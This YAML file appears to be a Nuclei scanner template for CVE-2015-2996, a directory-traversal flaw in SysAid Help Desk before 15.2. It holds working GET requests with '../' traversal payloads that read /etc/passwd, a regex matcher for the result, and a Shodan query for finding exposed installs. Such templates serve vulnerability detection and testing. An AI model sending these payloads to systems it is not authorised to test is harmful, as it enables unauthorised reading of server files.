nuclei-templates/cves/2015/CVE-2015-2996.yaml

39 lines
1.3 KiB
YAML

id: CVE-2015-2996
info:
name: SysAid Help Desk <15.2 - Local File Disclosure
author: 0x_Akoko
severity: high
description: |
Multiple directory traversal vulnerabilities in SysAid Help Desk before 15.2 allow remote attackers to (1) read arbitrary files via a .. (dot dot) in the fileName parameter to getGfiUpgradeFile or (2) cause a denial of service (CPU and memory consumption) via a .. (dot dot) in the fileName parameter to calculateRdsFileChecksum.
reference:
- https://seclists.org/fulldisclosure/2015/Jun/8
- https://nvd.nist.gov/vuln/detail/CVE-2015-2996
- https://www.sysaid.com/blog/entry/sysaid-15-2-your-voice-your-service-desk
- http://seclists.org/fulldisclosure/2015/Jun/8
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2015-2996
cwe-id: CWE-22
metadata:
shodan-query: http.favicon.hash:1540720428
tags: cve,cve2015,sysaid,lfi,seclists
requests:
- method: GET
path:
- "{{BaseURL}}/sysaid/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd"
- "{{BaseURL}}/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200